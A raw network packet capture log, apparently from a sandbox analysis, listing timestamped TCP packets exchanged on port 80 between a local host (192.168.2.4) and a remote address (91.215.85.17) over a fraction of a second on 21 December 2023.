                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200206041 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200247049 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200275898 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200314045 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200361013 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200443983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200483084 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200540066 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200556993 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200596094 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200649023 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200676918 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200678110 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200699091 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200716019 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200787067 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200824022 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200880051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.200963020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201004982 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201010942 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201092005 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201131105 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201160908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201199055 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201224089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201318979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201355934 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201407909 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201459885 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201498985 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201556921 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201601028 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201651096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201719999 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201760054 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201791048 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201826096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201865911 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.201994896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202037096 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202081919 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202155113 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202195883 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202244043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202280045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202320099 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202328920 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202363968 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202383041 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202435970 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202471972 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202512980 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202591896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202610016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202636003 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202647924 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202666044 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202702999 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202725887 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202769995 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202822924 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202861071 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202913046 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202949047 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.202994108 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203099966 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203139067 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203186989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203258038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203299046 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203381062 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203418016 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203469038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203531981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203568935 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203614950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203649044 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203690052 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203736067 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203775883 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203792095 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203880072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203921080 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.203948975 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204022884 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204062939 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204112053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204145908 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204176903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204282999 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204323053 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204332113 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204394102 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204435110 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204477072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204514027 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204555035 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204602957 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204643965 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204691887 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204790115 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204835892 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204857111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204895020 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.204945087 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205028057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205065012 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205121040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205194950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205235004 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205264091 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205300093 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205337048 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205437899 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205483913 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205509901 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205600977 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205640078 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205641031 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205676079 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205708027 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205740929 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205780029 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205821037 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205907106 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205920935 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205957890 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.205969095 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206011057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206048965 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206052065 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206089973 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206124067 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206161022 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206249952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206286907 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206346035 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206382036 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206439972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206475019 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206516981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206557035 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206583023 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206619024 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206629038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206665039 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206696033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206733942 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206749916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206785917 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206830025 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206903934 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206947088 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.206970930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207035065 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207082033 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207133055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207173109 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207214117 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207232952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207274914 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207317114 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207406044 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207448006 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207479000 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207515001 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207516909 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207571983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207616091 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207643032 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207726002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207767963 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207771063 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207807064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207854033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207947969 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.207992077 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208026886 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208081961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208125114 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208134890 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208173037 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208230972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208328009 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208372116 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208379030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208436012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208478928 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208498001 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208535910 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208609104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208755016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208796978 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208875895 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208955050 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.208997965 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209052086 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209089994 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209151030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209209919 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209252119 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209301949 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209388971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209431887 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209435940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209472895 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209599972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209712029 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209749937 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209800005 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209841013 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209841013 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209903002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.209971905 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210011959 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210057020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210133076 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210160971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210176945 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210203886 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210243940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210320950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210361004 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210364103 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210428953 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210474014 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210498095 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210536003 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210550070 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210597038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210639954 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210644007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210783005 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210797071 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210824013 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210834980 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210865021 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210908890 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210928917 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210966110 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.210997105 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211033106 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211071014 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211106062 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211146116 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211234093 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211273909 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211318970 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211365938 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211407900 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211409092 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211443901 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211510897 CET804973891.215.85.17192.168.2.4
